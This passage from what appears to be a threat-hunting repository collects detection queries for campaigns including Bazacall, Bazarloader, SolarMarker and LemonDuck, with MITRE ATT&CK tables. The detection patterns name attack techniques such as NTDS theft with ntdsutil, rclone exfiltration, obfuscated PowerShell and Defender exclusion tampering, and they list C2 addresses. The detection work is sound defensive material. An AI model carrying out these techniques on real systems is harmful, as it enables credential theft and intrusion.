tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Excel Macro Execution.md ================================================ # Bazacall Excel Macro Execution Bazacall uses malicious macro-enabled Excel documents to execute their payload. ## Query This query looks for the malicious macro being executed on a machine. ``` DeviceProcessEvents | where InitiatingProcessFileName =~ "excel.exe" and ProcessCommandLine has_all('mkdir', '&& copy', 'certutil.exe') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Excel file download domain pattern.md ================================================ # BazaCall Excel file download domain pattern BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Excel file, they are prompted to enable a malicious macro that infects their device with BazaLoader. This query surfaces connections to the distinctive *.xyz* domains that the BazaCall campaign uses to host malicious Excel files. ## Query ```kusto DeviceNetworkEvents | where RemoteUrl matches regex @".{14}\.xyz/config\.php" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Malicious Excel Delivery.md ================================================ # Bazacall Malicious Excel Delivery Bazacall uses malicious Excel files to execute payloads on affected devices. ## Query This query looks for files that are downloaded from URL paths known to be associated with the Bazacall threat. ``` DeviceFileEvents | where FileOriginUrl has "/cancel.php" and FileOriginReferrerUrl has "/account" or FileOriginUrl has "/download.php" and FileOriginReferrerUrl has "/case" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/NTDS theft.md ================================================ # Bazacall NTDS.dit Theft Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe. ## Query This query looks for copies of NTDS created in specific file paths known to be associated with the Bazacall threat. ``` DeviceProcessEvents | where FileName =~ "ntdsutil.exe" | where ProcessCommandLine has_any("full", "fu") | where ProcessCommandLine has_any ("temp", "perflogs", "programdata") // Exclusion | where ProcessCommandLine !contains @"Backup" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/Renamed Rclone Exfil.md ================================================ # Bazacall Renamed Rclone for Exfiltration Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration. ## Query This query looks for Rclone being renamed to be used for data exfiltration. ``` DeviceProcessEvents | where ProcessVersionInfoProductName has "rclone" and not(FileName has "rclone") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazacall/RunDLL Suspicious Network Connection.md ================================================ # RunDLL Suspicious Network Connections During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains a specific process paramter, ",GlobalOut" that can surface potentially malicious activity related to Bazacall and Bazaloader. ## Query This query looks for network connection events made by the RunDll32.exe process that have a command line that contains the ",GlobalOut" process parameter. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ 'rundll32.exe' and InitiatingProcessCommandLine has ",GlobalOut" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazarloader/Stolen Images Execution.md ================================================ # Stolen Images The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware. ## Query This query looks for instances of Wscript being used to execute the malicious "stolen images" file associated with this Bazarloader campaign. ``` DeviceProcessEvents | where FileName =~ "wscript.exe" and ProcessCommandLine has_all("stolen", "images") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazarloader/Zip-Doc - Creation of JPG Payload File.md ================================================ # Zip-Doc - Creation of JPG Payload File In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file. ## Query This query looks for instances of regsvr32.exe launching a file with a .jpg extension and summarizes the file name, SHA256, and Device ID for easy analysis. ``` DeviceImageLoadEvents | where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine has ".jpg" and FileName endswith ".jpg" | summarize by FileName, SHA256, DeviceId, bin(Timestamp, 1d) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bazarloader/Zip-Doc - Word Launching MSHTA.md ================================================ # Zip-Doc - Word Launching MSHTA The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader paylaod. ## Query This query looks for instnaces of Microsoft Word creating an .hta file ``` DeviceProcessEvents | where InitiatingProcessFileName =~ 'WINWORD.EXE' and FileName =~ 'cmd.exe' and ProcessCommandLine has_all('hta') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Bear Activity GTR 2019.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where (FileName =~ "xcopy.exe" and ProcessCommandLine has @" /S /E /C /Q /H \") or (FileName =~ "adexplorer.exe" and ProcessCommandLine has @" -snapshot """" c:\users\") | top 100 by Timestamp desc ================================================ FILE: Campaigns/Cloud Hopper.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ @"cscript.exe" and ProcessCommandLine has ".vbs /shell " | top 100 by Timestamp desc ================================================ FILE: Campaigns/DofoilNameCoinServerTraffic.txt ================================================ // This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers // The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/ DeviceNetworkEvents | where RemoteIP in ( "139.59.208.246","130.255.73.90","31.3.135.232","52.174.55.168","185.121.177.177","185.121.177.53", "62.113.203.55","144.76.133.38","169.239.202.202","5.135.183.146","142.0.68.13","103.253.12.18", "62.112.8.85","69.164.196.21","107.150.40.234","162.211.64.20","217.12.210.54","89.18.27.34", "193.183.98.154","51.255.167.0","91.121.155.13","87.98.175.85","185.97.7.7") | project DeviceName, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteIP, RemotePort ================================================ FILE: Campaigns/Dopplepaymer In-Memory Malware Implant.txt ================================================ /////////////////////////////////////////////////////////////////// // Dopplepaymer In-Memory Malware Implant // // This query identifies processes with command line launch strings // which match the pattern used in Dopplepaymer ransomware attacks. /////////////////////////////////////////////////////////////////// DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine startswith "-q -s {{" and ProcessCommandLine contains "}} -p " ================================================ FILE: Campaigns/Dragon Fly.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ "crackmapexec.exe" | top 100 by Timestamp desc ================================================ FILE: Campaigns/Elise backdoor.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where (FolderPath =~ @"C:\Windows\SysWOW64\cmd.exe" and ProcessCommandLine has @"\Windows\Caches\NavShExt.dll") or (ProcessCommandLine endswith @"\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll,Setting") | top 100 by Timestamp desc ================================================ FILE: Campaigns/Equation Group C2 Communication.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where (FolderPath endswith @"\rundll32.exe" and ProcessCommandLine endswith ",dll_u") or ProcessCommandLine has " -export dll_u " | top 100 by Timestamp desc ================================================ FILE: Campaigns/Hurricane Panda activity.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine endswith " localgroup administrators admin /add" or ProcessCommandLine has @"\Win64.exe" | top 100 by Timestamp desc ================================================ FILE: Campaigns/Judgement Panda exfil activity.txt ================================================ // Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml // Questions via Twitter: @janvonkirchheim DeviceProcessEvents | where Timestamp > ago(7d) | where ProcessCommandLine has @"\ldifde.exe -f -n " or ProcessCommandLine has @"\7za.exe a 1.7z " or ProcessCommandLine endswith @" eprod.ldf" or ProcessCommandLine has @"\aaaa\procdump64.exe" or ProcessCommandLine has @"\aaaa\netsess.exe" or ProcessCommandLine has @"\aaaa\7za.exe" or ProcessCommandLine has @"copy .\1.7z \" or ProcessCommandLine has @"copy \client\c$\aaaa\" or FolderPath == @"C:\Users\Public\7za.exe" | top 100 by Timestamp desc ================================================ FILE: Campaigns/Jupyter-Solarmaker/deimos-component-execution.md ================================================ # Jupyter AKA SolarMarker Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021. # Deimos malware component execution The following query checks specifically for the AMSI Script Content, signaling that the Deimos malware is loading for execution. This is most often seen loaded by Jupyter, but may be in accompaniment of other malware or Jupyter variants as well. ## Query ``` DeviceEvents | where InitiatingProcessFileName =~ "powershell.exe" | where ActionType == "AmsiScriptContent" | where AdditionalFields endswith '[mArS.deiMos]::inteRaCt()"}' | project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ActionType, AdditionalFields ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | v | | | Command and control | | | | Exfiltration | v | | | Impact | v | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-executions.md ================================================ # Jupyter AKA SolarMarker Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021. # Jupyter's evasive PowerShell executions The following query checks for instances of Jupyter or SolarMarker malware that launch a lengthy PowerShell script, which in turn reads from encoded strings to parse the next malicious script. The initiating process name for this will almost always end in ".tmp" and reflect the original downloaded executable name. ## Query ``` DeviceProcessEvents | where FileName =~ "powershell.exe" | where ProcessCommandLine has_all ("-command","FromBase64String","));remove-item $",".length;$j++){$","$i++;if($i -ge $","-bxor","UTF8.GetString") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Jupyter-Solarmaker/evasive-powershell-strings.md ================================================ # Evasive PowerShell with uncommon read strings This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query is not fully specific to Jupyter or SolarMarker, and will also return other malicious malware, but is unlikely to return false positives. ## Query ``` DeviceProcessEvents | where FileName == "powershell.exe" | where ProcessCommandLine has_all("-ep bypass","-command","get-content","remove-item","iex") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/Jupyter-Solarmaker/successive-tk-domain-calls.md ================================================ # Jupyter AKA SolarMarker Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization manipulation and malicious advertising in order to successfully encourage users to download malicious templates and documents. This malware has been popular since 2020 and currently is still active as of 2021. # Jupyter's SEO Delivery via .TK domains The following query checks for more than 5 instances of a .tk domain being contacted within a 10 minutes interval. This malware frequently will use anywhere from 5-10 .TK domains as well as other uncommon TLDs such as .blog, .site, .ml, and .gq., which will appear randomly generated and appear after a query to a hosting provider or advertising site from a search engine. Activity would be succeeded by the download of the malicious file. ## Query ``` DeviceNetworkEvents | where RemoteUrl endswith ".tk" | summarize make_set(RemoteUrl) by DeviceId,bin(Timestamp, 10m) | extend domainCount = array_length(set_RemoteUrl) | where domainCount >= 5 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-competition-killer.md ================================================ # LemonDuck competition killer script execution LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. ``` DeviceProcessEvents | where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F") | summarize make_set(ProcessCommandLine) by DeviceId | extend DeleteVolume = array_length(set_ProcessCommandLine) | where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok") | where DeleteVolume >= 40 and DeleteVolume <= 80 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-component-download-structure.md ================================================ # LemonDuck component download structure LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for any instance of the current version of the LemonDuck component collection commands, even if the component names changes. This structure has and may continue to change over time in order to obfuscate detection. This will surface behavior that will collect mining, secondary malware and lateral movement executables from external sites. This query will typically return downloads of files such as "if.bin" or "kr.bin" or additional mining components. ``` DeviceProcessEvents | where InitiatingProcessFileName =~ "cmd.exe" | where InitiatingProcessCommandLine has_all("echo","tmp+",".bin","gmd5","downloaddata","down_url") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-component-names.md ================================================ # LemonDuck common external component names LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the “Killer” and “Infection” functions for the malware as well as the mining components and potential secondary functions. This query only encompasses the most common component names. ``` DeviceProcessEvents | where InitiatingProcessFileName =~ "cmd.exe" | where InitiatingProcessCommandLine has_any("kr.bin","if.bin","m6.bin") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-control-structure.md ================================================ # LemonDuck command-and-control contact structure LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for the unique method of contacting the command-and-control (C2) infrastructure for LemonDuck in order to register updates from the bot client or exfiltrate data. This structure has changed over time and this most recent iteration is active as of this report and from June-July 2021. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ "powershell.exe" | where InitiatingProcessCommandLine has_all("Exponent=","FromBase64String","$url+") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-defender-exclusions.md ================================================ # LemonDuck Microsoft Defender drive exclusion tampering LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. ``` DeviceProcessEvents | where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess") | project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-email-subjects.md ================================================ # LemonDuck Email Subjects LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .doc, .zip or .js, though this could be subject to change as well as the subjects themselves. ``` EmailEvents | where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', 'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') | where AttachmentCount >= 1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-id-generation.md ================================================ # LemonDuck command-and-control ID generation LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query checks for the current method of exfiltrating basic component information to LemonDuck command and control servers. In previous iterations other methods were used and currently this logic is included at the end of callout to the server to identify the client. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ "powershell.exe" | where InitiatingProcessCommandLine endswith "(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-registration-function.md ================================================ # LemonDuck botnet registration functions LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for instances of function runs with name “SIEX”, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. ``` DeviceEvents | where ActionType == "PowerShellCommand" | where AdditionalFields =~ "{\"Command\":\"SIEX\"}" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | 